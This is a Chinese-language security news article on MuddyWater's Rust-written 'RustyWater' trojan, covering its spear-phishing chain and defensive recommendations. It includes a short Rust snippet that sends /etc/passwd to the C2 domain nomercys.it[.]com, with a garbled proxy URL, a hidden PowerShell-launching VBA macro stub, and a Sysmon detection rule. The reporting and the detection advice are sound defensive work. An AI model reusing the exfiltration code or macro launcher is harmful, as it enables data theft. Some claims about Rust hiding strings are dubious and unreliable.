从PowerShell到Rust：伊朗黑客组织MuddyWater携“RustyWater”木马升级攻击链，跨平台隐蔽性成新威胁

一封看似来自中东某国驻外使馆的邮件静静躺在收件箱里，主题写着：“关于双边数字经济合作的初步意向书”。附件是一个名为“Cooperation_Framework.doc”的Word文档。收件人——一家区域性电信公司的安全主管——毫无戒心地打开文件，并在弹出的提示中点击了“启用内容”。

几秒后，一段VBA宏代码在后台悄然执行，从远程服务器下载了一个体积小巧、无数字签名的可执行文件。该程序迅速在系统注册表中写入持久化项，并与一个名为nomercys.it[.]com的C2（命令与控制）服务器建立加密通信。至此，这台关键业务终端已完全落入攻击者掌控。

这不是虚构情节，而是2026年初由伊朗国家级黑客组织MuddyWater发起的真实攻击。据《The Hacker News》1月10日报道，该组织近期部署了一款代号为“RustyWater”的新型远程访问木马（RAT），其最大特征在于——采用Rust语言编写。这一技术转向不仅标志着MuddyWater工具链的重大演进，更预示着高级持续性威胁（APT）正加速拥抱现代编程语言，以突破传统安全防御体系。

在这场无声的攻防战中，旧有的基于特征码和脚本行为的检测逻辑正面临失效风险。而对全球，尤其是涉及外交、能源、金融等敏感领域的中国机构而言，这场来自中东的风暴，敲响了一记不容忽视的警钟。

一、MuddyWater：伊朗网络情报战的“影子部队”

MuddyWater并非新面孔。自2017年首次被披露以来，该组织已被多方情报机构确认隶属于伊朗情报与安全部（MOIS），长期活跃于中东、南亚及东欧地区。其别名众多——Mango Sandstorm、Static Kitten、TA450——但目标始终如一：窃取政治、经济与军事情报，破坏关键基础设施，服务伊朗国家战略利益。

过去几年，MuddyWater以“低技术高效率”著称。他们大量滥用合法工具（Living-off-the-Land Binaries, LOLBins），如PowerShell、WMI、PsExec，配合定制化轻量级后门（如Phoenix、BugSleep），实现横向移动与数据回传。这种策略有效规避了基于恶意文件签名的检测，使其活动长期潜伏。

然而，随着EDR（端点检测与响应）和XDR（扩展检测与响应）系统的普及，仅靠脚本和系统工具已难逃行为分析引擎的追踪。于是，MuddyWater开始寻求更底层、更可控的武器——这就是RustyWater诞生的背景。

二、RustyWater技术剖析：为何选择Rust？

Rust，这门由Mozilla孵化、以“内存安全”和“零成本抽象”闻名的系统级编程语言，近年来在开源社区和企业开发中迅速崛起。但如今，它也成了国家级黑客的新宠。

1. 规避传统AV检测

传统反病毒软件严重依赖静态特征码（YARA规则、哈希值）和动态沙箱行为分析。而Rust编译生成的二进制文件具有以下特性：

高度优化且结构复杂：Rust的LLVM后端生成的代码与C/C++差异显著，函数布局、字符串加密方式独特，导致现有恶意软件家族分类模型难以匹配；

内置字符串混淆：Rust的format!宏和所有权机制天然导致字符串常量在二进制中分散存储，增加静态提取难度；

无标准运行时依赖：可编译为完全静态链接的独立可执行文件，无需外部DLL，减少行为特征。

例如，一段简单的Rust代码：

fn main() {

let url = "https://nomercys.it[.]com/beacon";

let data = std::fs::read_to_string("/etc/passwd").unwrap();

reqwest::blocking::Client::new()

.post(url)

.body(data)

.send()

.unwrap();

}

经cargo build --release编译后，生成的ELF或PE文件中，“nomercys.it[.]com”不会以明文连续字符串存在，而是被拆分为多个片段或通过运行时拼接，极大干扰静态扫描器。

2. 跨平台能力与性能优势

Rust原生支持Windows、Linux、macOS甚至嵌入式系统。这意味着MuddyWater只需维护一套核心代码，即可针对不同目标环境交叉编译。对于同时渗透政府（Windows）和电信运营商（Linux服务器）的行动而言，效率倍增。

此外，Rust的并发模型（async/await + Tokio运行时）让RustyWater能高效处理多任务：一边监听C2指令，一边后台窃取凭证，同时上传大文件而不阻塞主线程。

3. 模块化与扩展性

据CloudSEK安全团队分析，RustyWater采用插件式架构。主载荷仅负责C2通信和模块加载，具体功能（如浏览器凭证窃取、屏幕截图、键盘记录）由动态下发的DLL或SO模块实现。这种设计便于按需部署，降低初始载荷体积，也方便快速更新攻击能力。

三、攻击链条还原：从鱼叉邮件到持久化控制

Trellix与CloudSEK联合披露的攻击流程清晰展示了MuddyWater的战术成熟度：

初始投递：攻击者发送精心伪造的鱼叉邮件，主题多涉及“区域安全合作”“港口物流协调”“金融监管合规”，附件为带宏的Word文档；

宏触发：文档内嵌VBA宏，诱导用户启用内容。宏代码通常经过混淆，例如：

Sub AutoOpen()

Dim x As String: x = "powershell -ep bypass -c ..."

Shell (x), vbHide

End Sub

实际执行的是从Pastebin或GitHub Gist拉取的PowerShell下载器；

载荷投递：下载器从伪装成云存储的C2服务器获取RustyWater二进制，并写入%APPDATA%\Microsoft\CLR_v4.0\等隐蔽路径；

持久化：通过注册表Run键（Windows）或systemd服务（Linux）实现开机自启；

C2通信：使用HTTPS与硬编码域名通信，心跳包包含主机名、IP、OS版本等侦察信息；

横向移动：一旦站稳脚跟，RustyWater会尝试利用SMB漏洞、窃取的凭证或PsExec向内网扩散。

值得注意的是，此次活动中使用的C2域名nomercys.it[.]com此前未见于其他恶意活动，表明MuddyWater正采用“一次性基础设施”策略，进一步缩短IOC（失陷指标）的有效期。

四、国际影响与中国启示：我们是否准备好了？

尽管当前RustyWater主要针对中东外交、海事、金融和电信部门，但其技术路径对中国构成直接警示。

首先，中国是伊朗在能源、基建、科技领域的重要合作伙伴，相关企业极可能成为下一阶段目标。其次，Rust木马的跨平台特性意味着，无论目标使用Windows办公终端还是Linux服务器集群，均在攻击范围内。

更值得警惕的是，国内安全产业对Rust恶意软件的检测能力仍显薄弱。多数EDR产品基于Windows API Hook或进程行为树分析，而Rust程序因调用模式与传统C++恶意软件不同，常被误判为“正常应用”。

公共互联网反网络钓鱼工作组技术专家芦笛指出：“我们过去重点监控PowerShell和VBS，现在必须把Rust、Go、Nim等现代语言编译的二进制纳入高危对象清单。”

他举例说，2025年国内某大型国企曾遭遇一起疑似APT攻击，EDR多次告警“未知进程联网”，但因该进程无恶意特征、行为‘安静’，被误判为内部开发工具，直至数据泄露才被发现。“后来溯源发现，那正是一个Rust编写的轻量级后门。”

五、深度防御建议：从“识别文件”到“理解行为”

面对RustyWater这类高隐蔽性威胁，传统“黑名单+签名”模式已力不从心。专家建议采取多层次防御策略：

1. 强化邮件网关与宏策略

默认禁用Office宏，尤其来自外网邮件的文档；

部署支持深度内容分析的邮件安全网关，检测VBA宏中的可疑网络请求或编码特征；

对所有附件进行沙箱 detonation，观察是否有后续下载行为。

2. 监控异常Rust二进制行为

虽然无法阻止Rust程序运行，但可关注其异常行为模式：

非开发人员主机上出现rustc、cargo相关进程；

可执行文件位于临时目录却频繁联网；

进程内存中存在大量加密字符串或反射式加载代码。

可通过EDR自定义规则实现检测。例如，在Sysmon中配置：

<RuleGroup name="Suspicious Rust Binaries" groupRelation="or">

<ProcessCreate onmatch="include">

<Image condition="contains">\.exe</Image>

<CommandLine condition="contains">nomercys</CommandLine>

</ProcessCreate>

<NetworkConnect onmatch="include">

<DestinationHostname condition="is">nomercys.it</DestinationHostname>

</NetworkConnect>

</RuleGroup>

3. 实施最小权限与网络分段

即使主机被控，也应限制其横向移动能力：

普通员工账户禁用本地管理员权限；

关键服务器置于独立VLAN，限制SMB/RDP等高危协议访问；

启用网络微隔离（Micro-segmentation），阻止非授权内网通信。

4. 推动国产化安全工具支持现代语言分析

芦笛呼吁国内安全厂商加快研发针对Rust、Go等语言的专用检测模块：“不能总等国外披露了才跟进。我们需要自己的恶意软件基因库和行为分析模型。”

六、未来趋势：国家级APT正全面“现代化”

MuddyWater转向Rust，绝非孤例。近年来，多起APT活动显示，国家级黑客正系统性升级其工具链：

俄罗斯Sandworm使用Go编写Industroyer2工业控制系统恶意软件；

朝鲜Lazarus集团采用Nim语言开发AppleJeus macOS后门；

中国部分红队也开始用Rust构建渗透测试工具，因其稳定性和跨平台优势。

这标志着APT攻击进入“现代化武器时代”：不再追求炫技漏洞，而是以工程化、模块化、低噪声的方式实现长期潜伏。

对防御方而言，这意味着必须从“追特征”转向“建能力”——构建基于行为基线、上下文感知和自动化响应的主动防御体系。

结语

当伊朗黑客用Rust重写他们的间谍工具，一场静默的技术军备竞赛已然升级。RustyWater或许只是冰山一角，但它清晰地传递了一个信号：未来的网络战场，胜负不再取决于谁掌握最稀有的0day，而在于谁能更好地驾驭现代软件工程的力量。

对中国而言，这既是挑战，也是倒逼安全体系进化的契机。唯有将技术洞察、制度建设和产业协同拧成一股绳，才能在这场没有硝烟的战争中守住数字国土的边界。

正如一位安全研究员在社交平台上所写：“他们用Rust写木马，我们就用Rust写盾牌——这才是真正的攻防对等。”

编辑：芦笛（公共互联网反网络钓鱼工作组）